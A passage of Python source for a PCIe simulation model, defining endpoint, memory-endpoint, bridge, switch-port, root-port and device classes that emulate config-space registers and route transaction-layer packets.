min(byte_length, 0x1000 - (addr & 0xfff)) # 4k align\n tlp.set_be_data(addr, data[n:n+byte_length])\n\n yield from self.send(tlp)\n\n n += byte_length\n addr += byte_length\n\n def mem_write_words(self, addr, data, ws=2, timeout=0, attr=0, tc=0):\n assert ws in (1, 2, 4, 8)\n words = data\n data = b''\n for w in words:\n data += w.to_bytes(ws, 'little')\n yield from self.mem_write(addr, data, timeout, attr, tc)\n\n def mem_write_dwords(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, data, 4, timeout, attr, tc)\n\n def mem_write_qwords(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, data, 8, timeout, attr, tc)\n\n def mem_write_byte(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write(addr, [data], timeout, attr, tc)\n\n def mem_write_word(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n def mem_write_dword(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_dwords(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n def mem_write_qword(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_qwords(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n\nclass Endpoint(Function):\n \"\"\"PCIe endpoint function, implements endpoint config space\"\"\"\n def __init__(self, *args, **kwargs):\n super(Endpoint, self).__init__(*args, **kwargs)\n\n # configuration registers\n self.header_type = 0\n self.bar = [0]*6\n self.bar_mask = [0]*6\n self.cardbus_cis = 0\n self.subsystem_vendor_id = 0\n self.subsystem_id = 0\n\n self.pcie_device_type = 0\n\n \"\"\"\n Endpoint (type 0) config space\n\n 31 0\n +---------------------------------+---------------------------------+\n | Device ID | Vendor ID | 0 0x00\n +---------------------------------+---------------------------------+\n | Status | Command | 1 0x04\n +---------------------------------+----------------+----------------+\n | Class Code | Revision ID | 2 0x08\n +----------------+----------------+----------------+----------------+\n | BIST | Header Type | Primary | Cache Line | 3 0x0C\n | | | Latency Timer | Size |\n +----------------+----------------+----------------+----------------+\n | Base Address Register 0 | 4 0x10\n +-------------------------------------------------------------------+\n | Base Address Register 1 | 5 0x14\n +-------------------------------------------------------------------+\n | Base Address Register 2 | 6 0x18\n +-------------------------------------------------------------------+\n | Base Address Register 3 | 7 0x1C\n +-------------------------------------------------------------------+\n | Base Address Register 4 | 8 0x20\n +-------------------------------------------------------------------+\n | Base Address Register 5 | 9 0x24\n +-------------------------------------------------------------------+\n | Cardbus CIS pointer | 10 0x28\n +---------------------------------+---------------------------------+\n | Subsystem ID | Subsystem Vendor ID | 11 0x2C\n +---------------------------------+---------------------------------+\n | Expansion ROM Base Address | 12 0x30\n +--------------------------------------------------+----------------+\n | Reserved | Cap Ptr | 13 0x34\n +--------------------------------------------------+----------------+\n | Reserved | 14 0x38\n +----------------+----------------+----------------+----------------+\n | Max Lat | Min Gnt | Int Pin | Int Line | 15 0x3C\n +----------------+----------------+----------------+----------------+\n \"\"\"\n def read_config_register(self, reg):\n if reg == 4: return self.bar[0]\n elif reg == 5: return self.bar[1]\n elif reg == 6: return self.bar[2]\n elif reg == 7: return self.bar[3]\n elif reg == 8: return self.bar[4]\n elif reg == 9: return self.bar[5]\n elif reg == 10: return self.cardbus_cis\n elif reg == 11: return (self.subsystem_id << 16) | self.subsystem_vendor_id\n elif reg == 12: return self.expansion_rom_addr\n elif reg == 13: return self.cap_ptr\n elif reg == 14: return 0 # reserved\n elif reg == 15: return (self.intr_pin << 8) | self.intr_line\n else: return super(Endpoint, self).read_config_register(reg)\n\n def write_config_register(self, reg, data, mask):\n if reg == 4: self.bar[0] = byte_mask_update(self.bar[0], mask, data, self.bar_mask[0])\n elif reg == 5: self.bar[1] = byte_mask_update(self.bar[1], mask, data, self.bar_mask[1])\n elif reg == 6: self.bar[2] = byte_mask_update(self.bar[2], mask, data, self.bar_mask[2])\n elif reg == 7: self.bar[3] = byte_mask_update(self.bar[3], mask, data, self.bar_mask[3])\n elif reg == 8: self.bar[4] = byte_mask_update(self.bar[4], mask, data, self.bar_mask[4])\n elif reg == 9: self.bar[5] = byte_mask_update(self.bar[5], mask, data, self.bar_mask[5])\n elif reg == 12: self.expansion_rom_addr = byte_mask_update(self.expansion_rom_addr, mask, data)\n elif reg == 15:\n self.intr_line = byte_mask_update(self.intr_line, mask & 1, data)\n self.intr_pin = byte_mask_update(self.intr_pin, (mask >> 1) & 1, data >> 8)\n else: super(Endpoint, self).write_config_register(reg, data, mask)\n\n\nclass MemoryEndpoint(Endpoint):\n \"\"\"PCIe endpoint function, implements BARs pointing to internal memory\"\"\"\n def __init__(self, *args, **kwargs):\n super(MemoryEndpoint, self).__init__(*args, **kwargs)\n\n self.regions = [None]*6\n self.bar_ptr = 0\n\n self.register_rx_tlp_handler(TLP_IO_READ, self.handle_io_read_tlp)\n self.register_rx_tlp_handler(TLP_IO_WRITE, self.handle_io_write_tlp)\n self.register_rx_tlp_handler(TLP_MEM_READ, self.handle_mem_read_tlp)\n self.register_rx_tlp_handler(TLP_MEM_READ_64, self.handle_mem_read_tlp)\n self.register_rx_tlp_handler(TLP_MEM_WRITE, self.handle_mem_write_tlp)\n self.register_rx_tlp_handler(TLP_MEM_WRITE_64, self.handle_mem_write_tlp)\n\n def add_region(self, size, read=None, write=None, ext=False, prefetch=False, io=False):\n if self.bar_ptr > 5 or (ext and self.bar_ptr > 4):\n raise Exception(\"No more BARs available\")\n\n arr = None\n self.configure_bar(self.bar_ptr, size, ext, prefetch, io)\n if not read and not write:\n arr = bytearray(size)\n self.regions[self.bar_ptr] = arr\n else:\n self.regions[self.bar_ptr] = (read, write)\n if ext:\n self.bar_ptr += 2\n else:\n self.bar_ptr += 1\n return arr\n\n def add_io_region(self, size, read=None, write=None):\n return self.add_region(size, read, write, False, False, True)\n\n def add_mem_region(self, size, read=None, write=None):\n return self.add_region(size, read, write)\n\n def add_prefetchable_mem_region(self, size, read=None, write=None):\n return self.add_region(size, read, write, True, True)\n\n def read_region(self, region, addr, length):\n if not self.regions[region]:\n raise Exception(\"Invalid region\")\n if type(self.regions[region]) is tuple:\n return self.regions[region][0](addr, length)\n else:\n return self.regions[region][addr:addr+length]\n\n def write_region(self, region, addr, data):\n if not self.regions[region]:\n raise Exception(\"Invalid region\")\n if type(self.regions[region]) is tuple:\n self.regions[region][1](addr, length)\n else:\n self.regions[region][addr:addr+len(data)] = data\n\n def handle_io_read_tlp(self, tlp):\n m = self.match_bar(tlp.address, True)\n if len(m) == 1:\n # logging\n print(\"[%s] IO read\" % (highlight(self.get_desc())))\n\n assert tlp.length == 1\n\n # prepare completion TLP\n cpl = TLP()\n cpl.set_completion_data(tlp, self.get_id())\n\n region = m[0][0]\n addr = m[0][1]\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # perform read\n data = bytearray(4)\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n data[start_offset:offset] = self.read_region(region, addr+start_offset, offset-start_offset)\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n data[start_offset:offset] = self.read_region(region, addr+start_offset, offset-start_offset)\n\n cpl.set_data(data)\n cpl.byte_count = 4\n cpl.length = 1\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n else:\n # logging\n print(\"IO request did not match any BARs\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, self.get_id())\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_io_write_tlp(self, tlp):\n m = self.match_bar(tlp.address, True)\n if len(m) == 1:\n # logging\n print(\"[%s] IO write\" % (highlight(self.get_desc())))\n\n assert tlp.length == 1\n\n # prepare completion TLP\n cpl = TLP()\n cpl.set_completion(tlp, self.get_id())\n\n region = m[0][0]\n addr = m[0][1]\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # perform write\n data = tlp.get_data()\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n self.write_region(region, addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n self.write_region(region, addr+start_offset, data[start_offset:offset])\n\n cpl.byte_count = 4\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n else:\n # logging\n print(\"IO request did not match any BARs\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, self.get_id())\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_mem_read_tlp(self, tlp):\n m = self.match_bar(tlp.address)\n if len(m) == 1:\n print(\"[%s] Memory read\" % (highlight(self.get_desc())))\n\n # perform operation\n region = m[0][0]\n addr = m[0][1]\n\n # check for 4k boundary crossing\n if tlp.length*4 > 0x1000 - (addr & 0xfff):\n print(\"Request crossed 4k boundary, discarding request\")\n return\n\n # perform read\n data = bytearray(self.read_region(region, addr, tlp.length*4))\n\n # prepare completion TLP(s)\n m = 0\n n = 0\n addr = tlp.address+tlp.get_first_be_offset()\n dw_length = tlp.length\n byte_length = tlp.get_be_byte_count()\n\n while m < dw_length:\n cpl = TLP()\n cpl.set_completion_data(tlp, self.get_id())\n\n cpl_dw_length = dw_length - m\n cpl_byte_length = byte_length - n\n cpl.byte_count = cpl_byte_length\n if cpl_dw_length > 32 << self.max_payload_size:\n cpl_dw_length = 32 << self.max_payload_size # max payload size\n cpl_dw_length -= (addr & 0x7c) >> 2 # RCB align\n\n cpl.lower_address = addr & 0x7f\n\n cpl.set_data(data[m*4:(m+cpl_dw_length)*4])\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n m += cpl_dw_length;\n n += cpl_dw_length*4 - (addr&3)\n addr += cpl_dw_length*4 - (addr&3)\n\n else:\n # logging\n print(\"Memory request did not match any BARs\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, self.get_id())\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_mem_write_tlp(self, tlp):\n m = self.match_bar(tlp.address)\n if len(m) == 1:\n # logging\n print(\"[%s] Memory write\" % (highlight(self.get_desc())))\n\n # perform operation\n region = m[0][0]\n addr = m[0][1]\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # check for 4k boundary crossing\n if tlp.length*4 > 0x1000 - (addr & 0xfff):\n print(\"Request crossed 4k boundary, discarding request\")\n return\n\n # perform write\n data = tlp.get_data()\n\n # first dword\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n self.write_region(region, addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if tlp.length > 2:\n # middle dwords\n if start_offset is None:\n start_offset = offset\n offset += (tlp.length-2)*4\n\n if tlp.length > 1:\n # last dword\n mask = tlp.last_be\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n self.write_region(region, addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n self.write_region(region, addr+start_offset, data[start_offset:offset])\n\n # memory writes are posted, so don't send a completion\n\n else:\n # logging\n print(\"Memory request did not match any BARs\")\n\n\nclass Bridge(Function):\n \"\"\"PCIe bridge function, implements bridge config space and TLP routing\"\"\"\n def __init__(self, *args, **kwargs):\n super(Bridge, self).__init__(*args, **kwargs)\n\n # configuration registers\n self.header_type = 1\n self.bar = [0]*2\n self.bar_mask = [0]*2\n self.pri_bus_num = 0\n self.sec_bus_num = 0\n self.sub_bus_num = 0\n self.sec_lat_timer = 0\n self.io_base = 0x0000\n self.io_limit = 0x0fff\n self.sec_status = 0\n self.mem_base = 0x00000000\n self.mem_limit = 0x000fffff\n self.prefetchable_mem_base = 0x00000000\n self.prefetchable_mem_limit = 0x000fffff\n self.bridge_control = 0\n\n self.pcie_device_type = 0x6\n\n self.root = False\n\n self.upstream_port = Port(self, self.upstream_recv)\n self.upstream_tx_handler = self.upstream_port.send\n\n self.downstream_port = Port(self, self.downstream_recv)\n self.downstream_tx_handler = self.downstream_port.send\n\n \"\"\"\n Bridge (type 1) config space\n\n 31 0\n +---------------------------------+---------------------------------+\n | Device ID | Vendor ID | 0 0x00\n +---------------------------------+---------------------------------+\n | Status | Command | 1 0x04\n +---------------------------------+----------------+----------------+\n | Class Code | Revision ID | 2 0x08\n +----------------+----------------+----------------+----------------+\n | BIST | Header Type | Primary | Cache Line | 3 0x0C\n | | | Latency Timer | Size |\n +----------------+----------------+----------------+----------------+\n | Base Address Register 0 | 4 0x10\n +-------------------------------------------------------------------+\n | Base Address Register 1 | 5 0x14\n +----------------+----------------+----------------+----------------+\n | Secondary | Subordinate | Secondary | Primary | 6 0x18\n | Latency Timer | Bus Number | Bus Number | Bus Number |\n +----------------+----------------+----------------+----------------+\n | Secondary Status | IO Limit | IO Base | 7 0x1C\n +---------------------------------+----------------+----------------+\n | Memory Limit | Memory Base | 8 0x20\n +---------------------------------+---------------------------------+\n | Prefetchable Memory Limit | Prefetchable Memory Base | 9 0x24\n +---------------------------------+---------------------------------+\n | Prefetchable Base Upper 32 | 10 0x28\n +-------------------------------------------------------------------+\n | Prefetchable Limit Upper 32 | 11 0x2C\n +---------------------------------+---------------------------------+\n | IO Lim Upper 16 | IO Base Lower 16 | 12 0x30\n +---------------------------------+----------------+----------------+\n | Reserved | Cap Ptr | 13 0x34\n +--------------------------------------------------+----------------+\n | Expansion ROM Base Address | 14 0x38\n +---------------------------------+----------------+----------------+\n | Bridge Control | Int Pin | Int Line | 15 0x3C\n +---------------------------------+----------------+----------------+\n\n \"\"\"\n def read_config_register(self, reg):\n if reg == 4: return self.bar[0]\n elif reg == 5: return self.bar[1]\n elif reg == 6: return (self.sec_lat_timer << 24) | (self.sub_bus_num << 16) | (self.sec_bus_num << 8) | self.pri_bus_num\n elif reg == 7: return (self.sec_status << 16) | (self.io_limit & 0xf000) | ((self.io_base & 0xf000) >> 8)\n elif reg == 8: return (self.mem_limit & 0xfff00000) | ((self.mem_base & 0xfff00000) >> 16)\n elif reg == 9: return (self.prefetchable_mem_limit & 0xfff00000) | ((self.prefetchable_mem_base & 0xfff00000) >> 16)\n elif reg == 10: return self.prefetchable_mem_base >> 32\n elif reg == 11: return self.prefetchable_mem_limit >> 32\n elif reg == 12: return (self.io_limit & 0xffff0000) | ((self.io_base & 0xffff0000) >> 16)\n elif reg == 13: return self.cap_ptr\n elif reg == 14: return self.expansion_rom_addr\n elif reg == 15: return (self.bridge_control << 16) | (self.intr_pin << 8) | self.intr_line\n else: return super(Bridge, self).read_config_register(reg)\n\n def write_config_register(self, reg, data, mask):\n if reg == 4:\n self.bar[0] = byte_mask_update(self.bar[0], mask, data, self.bar_mask[0])\n if reg == 5:\n self.bar[1] = byte_mask_update(self.bar[1], mask, data, self.bar_mask[1])\n elif reg == 6:\n self.pri_bus_num = byte_mask_update(self.pri_bus_num, mask & 0x1, data)\n self.sec_bus_num = byte_mask_update(self.sec_bus_num, (mask >> 1) & 1, data >> 8)\n self.sub_bus_num = byte_mask_update(self.sub_bus_num, (mask >> 2) & 1, data >> 16)\n self.sec_lat_timer = byte_mask_update(self.sec_lat_timer, (mask >> 3) & 1, data >> 24)\n elif reg == 7:\n self.io_base = byte_mask_update(self.io_base, (mask & 0x1) << 1, data << 8, 0xf000)\n self.io_limit = byte_mask_update(self.io_limit, (mask & 0x2), data, 0xf000) | 0xfff\n self.sec_status = byte_mask_update(self.sec_status, (mask >> 2) & 1, 0x0000, (data >> 16) & 0xf900)\n elif reg == 8:\n self.mem_base = byte_mask_update(self.mem_base, (mask & 0x3) << 2, data << 16, 0xfff00000)\n self.mem_limit = byte_mask_update(self.mem_limit, (mask & 0xc), data, 0xfff00000) | 0xfffff\n elif reg == 9:\n self.prefetchable_mem_base = byte_mask_update(self.prefetchable_mem_base, (mask & 0x3) << 2, data << 16, 0xfff00000)\n self.prefetchable_mem_limit = byte_mask_update(self.prefetchable_mem_limit, (mask & 0xc), data, 0xfff00000) | 0xfffff\n elif reg == 10:\n self.prefetchable_mem_base = byte_mask_update(self.prefetchable_mem_base, mask << 4, data << 32)\n elif reg == 11:\n self.prefetchable_mem_limit = byte_mask_update(self.prefetchable_mem_limit, mask << 4, data << 32)\n elif reg == 12:\n self.io_base = byte_mask_update(self.io_base, (mask & 0x3) << 2, data << 16)\n self.io_limit = byte_mask_update(self.io_limit, (mask & 0xc), data)\n elif reg == 14:\n self.expansion_rom_addr = byte_mask_update(self.expansion_rom_addr, mask, data)\n elif reg == 15:\n self.intr_line = byte_mask_update(self.intr_line, mask & 0x1, data)\n self.intr_pin = byte_mask_update(self.intr_pin, (mask >> 1) & 1, data >> 8)\n self.bridge_control = byte_mask_update(self.min_gnt, (mask >> 2) & 3, data >> 16, 0x0043)\n else:\n super(Bridge, self).write_config_register(reg, data, mask)\n\n def upstream_send(self, tlp):\n assert tlp.check()\n if self.upstream_tx_handler is None:\n raise Exception(\"Transmit handler not set\")\n yield from self.upstream_tx_handler(tlp)\n\n def upstream_recv(self, tlp):\n # logging\n if trace_routing:\n print(\"[%s] Routing downstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n if tlp.fmt_type == TLP_CFG_READ_0 or tlp.fmt_type == TLP_CFG_WRITE_0:\n yield from self.handle_tlp(tlp)\n elif tlp.fmt_type == TLP_CFG_READ_1 or tlp.fmt_type == TLP_CFG_WRITE_1:\n # config type 1\n if self.sec_bus_num <= tlp.dest_id.bus <= self.sub_bus_num:\n if tlp.dest_id.bus == self.sec_bus_num:\n # targeted to directly connected device; change to type 0\n if tlp.fmt_type == TLP_CFG_READ_1:\n tlp.fmt_type = TLP_CFG_READ_0\n elif tlp.fmt_type == TLP_CFG_WRITE_1:\n tlp.fmt_type = TLP_CFG_WRITE_0\n yield from self.route_downstream_tlp(tlp, False)\n else:\n # error\n pass\n elif (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n # Completions\n if not self.root and tlp.requester_id == self.get_id():\n # for me\n yield from self.handle_tlp(tlp)\n elif self.sec_bus_num <= tlp.requester_id.bus <= self.sub_bus_num:\n yield from self.route_downstream_tlp(tlp, False)\n else:\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_ID or tlp.fmt_type == TLP_MSG_DATA_ID:\n # ID routed message\n if not self.root and tlp.dest_id == self.get_id():\n # for me\n yield from self.handle_tlp(tlp)\n elif self.sec_bus_num <= tlp.dest_id.bus <= self.sub_bus_num:\n yield from self.route_downstream_tlp(tlp, False)\n else:\n # error\n pass\n elif (tlp.fmt_type == TLP_IO_READ or tlp.fmt_type == TLP_IO_WRITE):\n # IO read/write\n if self.match_bar(tlp.address, io=True):\n # for me\n yield from self.handle_tlp(tlp)\n elif self.io_base <= tlp.address <= self.io_limit:\n yield from self.route_downstream_tlp(tlp, False)\n else:\n # error\n pass\n elif (tlp.fmt_type == TLP_MEM_READ or tlp.fmt_type == TLP_MEM_READ_64 or\n tlp.fmt_type == TLP_MEM_WRITE or tlp.fmt_type == TLP_MEM_WRITE_64):\n # Memory read/write\n if self.match_bar(tlp.address):\n # for me\n yield from self.handle_tlp(tlp)\n elif self.mem_base <= tlp.address <= self.mem_limit or self.prefetchable_mem_base <= tlp.address <= self.prefetchable_mem_limit:\n yield from self.route_downstream_tlp(tlp, False)\n else:\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_TO_RC or tlp.fmt_type == TLP_MSG_DATA_TO_RC:\n # Message to root complex\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_BCAST or tlp.fmt_type == TLP_MSG_DATA_BCAST:\n # Message broadcast from root complex\n yield from self.route_downstream_tlp(tlp, False)\n elif tlp.fmt_type == TLP_MSG_LOCAL or tlp.fmt_type == TLP_MSG_DATA_LOCAL:\n # Message local to receiver\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_GATHER or tlp.fmt_type == TLP_MSG_DATA_GATHER:\n # Message gather to root complex\n # error\n pass\n else:\n # logging\n raise Exception(\"Unknown/invalid packet type\")\n\n def route_downstream_tlp(self, tlp, from_downstream=False):\n yield from self.downstream_send(tlp)\n\n def downstream_send(self, tlp):\n assert tlp.check()\n if self.downstream_tx_handler is None:\n raise Exception(\"Transmit handler not set\")\n yield from self.downstream_tx_handler(tlp)\n\n def downstream_recv(self, tlp):\n # logging\n if trace_routing:\n print(\"[%s] Routing upstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n if (tlp.fmt_type == TLP_CFG_READ_0 or tlp.fmt_type == TLP_CFG_WRITE_0 or\n tlp.fmt_type == TLP_CFG_READ_1 or tlp.fmt_type == TLP_CFG_WRITE_1):\n # error\n pass\n elif (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n # Completions\n if not self.root and tlp.requester_id == self.get_id():\n # for me\n yield from self.handle_tlp(tlp)\n elif self.sec_bus_num <= tlp.requester_id.bus <= self.sub_bus_num:\n if self.root and tlp.requester_id.bus == self.pri_bus_num and tlp.requester_id.device == 0:\n yield from self.upstream_send(tlp)\n else:\n yield from self.route_downstream_tlp(tlp, True)\n else:\n yield from self.upstream_send(tlp)\n elif tlp.fmt_type == TLP_MSG_ID or tlp.fmt_type == TLP_MSG_DATA_ID:\n # ID routed messages\n if not self.root and tlp.dest_id == self.get_id():\n # for me\n yield from self.handle_tlp(tlp)\n elif self.sec_bus_num <= tlp.dest_id.bus <= self.sub_bus_num:\n if self.root and tlp.dest_id.bus == self.pri_bus_num and tlp.dest_id.device == 0:\n yield from self.upstream_send(tlp)\n else:\n yield from self.route_downstream_tlp(tlp, True)\n else:\n yield from self.upstream_send(tlp)\n elif (tlp.fmt_type == TLP_IO_READ or tlp.fmt_type == TLP_IO_WRITE):\n # IO read/write\n if self.match_bar(tlp.address, io=True):\n # for me\n yield from self.handle_tlp(tlp)\n elif self.io_base <= tlp.address <= self.io_limit:\n yield from self.route_downstream_tlp(tlp, True)\n else:\n yield from self.upstream_send(tlp)\n elif (tlp.fmt_type == TLP_MEM_READ or tlp.fmt_type == TLP_MEM_READ_64 or\n tlp.fmt_type == TLP_MEM_WRITE or tlp.fmt_type == TLP_MEM_WRITE_64):\n # Memory read/write\n if self.match_bar(tlp.address):\n # for me\n yield from self.handle_tlp(tlp)\n elif self.mem_base <= tlp.address <= self.mem_limit or self.prefetchable_mem_base <= tlp.address <= self.prefetchable_mem_limit:\n yield from self.route_downstream_tlp(tlp, True)\n else:\n yield from self.upstream_send(tlp)\n elif tlp.fmt_type == TLP_MSG_TO_RC or tlp.fmt_type == TLP_MSG_DATA_TO_RC:\n # Message to root complex\n yield from self.upstream_send(tlp)\n elif tlp.fmt_type == TLP_MSG_BCAST or tlp.fmt_type == TLP_MSG_DATA_BCAST:\n # Message broadcast from root complex\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_LOCAL or tlp.fmt_type == TLP_MSG_DATA_LOCAL:\n # Message local to receiver\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_GATHER or tlp.fmt_type == TLP_MSG_DATA_GATHER:\n # Message gather to root complex\n raise Exception(\"TODO\")\n else:\n raise Exception(\"Unknown/invalid packet type\")\n\n def send(self, tlp):\n # route local transmissions as if they came in via downstream port\n yield from self.downstream_recv(tlp)\n\n\nclass SwitchUpstreamPort(Bridge):\n def __init__(self, *args, **kwargs):\n super(SwitchUpstreamPort, self).__init__(*args, **kwargs)\n\n self.pcie_device_type = 0x5\n\n self.downstream_port = BusPort(self, self.downstream_recv)\n self.downstream_tx_handler = None\n\n self.desc = \"SwitchUpstreamPort\"\n\n self.vendor_id = 0x1234\n self.device_id = 0x0003\n\n def route_downstream_tlp(self, tlp, from_downstream=False):\n assert tlp.check()\n\n # route downstream packet\n ok = False\n for p in self.downstream_port.other:\n dev = p.parent\n if tlp.fmt_type == TLP_CFG_READ_0 or tlp.fmt_type == TLP_CFG_WRITE_0:\n # config type 0\n if tlp.dest_id.device == dev.device_num and tlp.dest_id.function == dev.function_num:\n yield from p.ext_recv(TLP(tlp))\n return\n elif tlp.fmt_type == TLP_CFG_READ_1 or tlp.fmt_type == TLP_CFG_WRITE_1:\n # config type 1\n if isinstance(dev, Bridge) and dev.sec_bus_num <= tlp.dest_id.bus <= dev.sub_bus_num:\n yield from p.ext_recv(TLP(tlp))\n return\n elif (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n # Completions\n if tlp.requester_id == dev.get_id():\n yield from p.ext_recv(TLP(tlp))\n return\n elif isinstance(dev, Bridge) and dev.sec_bus_num <= tlp.requester_id.bus <= dev.sub_bus_num:\n yield from p.ext_recv(TLP(tlp))\n return\n elif tlp.fmt_type == TLP_MSG_ID or tlp.fmt_type == TLP_MSG_DATA_ID:\n # ID routed message\n if tlp.dest_id == dev.get_id():\n yield from p.ext_recv(TLP(tlp))\n return\n elif isinstance(dev, Bridge) and dev.sec_bus_num <= tlp.requester_id.bus <= dev.sub_bus_num:\n yield from p.ext_recv(TLP(tlp))\n return\n elif (tlp.fmt_type == TLP_IO_READ or tlp.fmt_type == TLP_IO_WRITE):\n # IO read/write\n if dev.match_bar(tlp.address, True):\n yield from p.ext_recv(TLP(tlp))\n return\n elif isinstance(dev, Bridge) and dev.io_base <= tlp.address <= dev.io_limit:\n yield from p.ext_recv(TLP(tlp))\n return\n elif (tlp.fmt_type == TLP_MEM_READ or tlp.fmt_type == TLP_MEM_READ_64 or\n tlp.fmt_type == TLP_MEM_WRITE or tlp.fmt_type == TLP_MEM_WRITE_64):\n # Memory read/write\n if dev.match_bar(tlp.address):\n yield from p.ext_recv(TLP(tlp))\n return\n elif isinstance(dev, Bridge) and (dev.mem_base <= tlp.address <= dev.mem_limit or dev.prefetchable_mem_base <= tlp.address <= dev.prefetchable_mem_limit):\n yield from p.ext_recv(TLP(tlp))\n return\n elif tlp.fmt_type == TLP_MSG_TO_RC or tlp.fmt_type == TLP_MSG_DATA_TO_RC:\n # Message to root complex\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_BCAST or tlp.fmt_type == TLP_MSG_DATA_BCAST:\n # Message broadcast from root complex\n yield from p.ext_recv(TLP(tlp))\n ok = True\n elif tlp.fmt_type == TLP_MSG_LOCAL or tlp.fmt_type == TLP_MSG_DATA_LOCAL:\n # Message local to receiver\n # error\n pass\n elif tlp.fmt_type == TLP_MSG_GATHER or tlp.fmt_type == TLP_MSG_DATA_GATHER:\n # Message gather to root complex\n # error\n pass\n else:\n # logging\n raise Exception(\"Unknown/invalid packet type\")\n\n if not ok:\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, (self.bus_num, self.device_num, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n if from_downstream:\n yield from self.route_downstream_tlp(cpl, False)\n else:\n yield from self.upstream_send(cpl)\n\n\nclass SwitchDownstreamPort(Bridge):\n def __init__(self, *args, **kwargs):\n super(SwitchDownstreamPort, self).__init__(*args, **kwargs)\n\n self.pcie_device_type = 0x6\n\n self.desc = \"SwitchDownstreamPort\"\n\n self.vendor_id = 0x1234\n self.device_id = 0x0004\n\n def connect(self, port):\n self.downstream_port.connect(port)\n\n\nclass HostBridge(SwitchUpstreamPort):\n def __init__(self, *args, **kwargs):\n super(HostBridge, self).__init__(*args, **kwargs)\n\n self.desc = \"HostBridge\"\n\n self.vendor_id = 0x1234\n self.device_id = 0x0001\n\n self.pri_bus_num = 0\n self.sec_bus_num = 0\n self.sub_bus_num = 255\n\n\nclass RootPort(SwitchDownstreamPort):\n def __init__(self, *args, **kwargs):\n super(RootPort, self).__init__(*args, **kwargs)\n\n self.pcie_device_type = 0x4\n\n self.desc = \"RootPort\"\n\n self.vendor_id = 0x1234\n self.device_id = 0x0002\n\n def connect(self, port):\n self.downstream_port.connect(port)\n\n\nclass Device(object):\n \"\"\"PCIe device, container for multiple functions\"\"\"\n def __init__(self, eps=None):\n self.bus_num = 0\n self.device_num = 0\n\n self.desc = \"Device\"\n\n self.default_function = Endpoint\n\n self.functions = []\n self.upstream_port = Port(self, self.upstream_recv)\n\n if eps:\n try:\n for ep in eps:\n self.append_function(ep)\n except:\n self.append_function(eps)\n\n def get_desc(self):\n return \"%02x:%02x %s\" % (self.bus_num, self.device_num, self.desc)\n\n def next_free_function_number(self):\n self.functions.sort(key=lambda x: x.function_num)\n if not self.functions:\n return 0\n for x in range(len(self.functions)):\n if self.functions[x].function_num != x:\n return x\n if len(self.functions) < 8:\n return len(self.functions)\n return None\n\n def add_function(self, function):\n for f in self.functions:\n if f.function_num == function.function_num:\n raise Exception(\"Function number already in use\")\n function.upstream_tx_handler = self.upstream_send\n self.functions.append(function)\n self.functions.sort(key=lambda x: x.function_num)\n if len(self.functions) > 1:\n for f in self.functions:\n f.header_type |= 0x80\n return function\n\n def append_function(self, function):\n 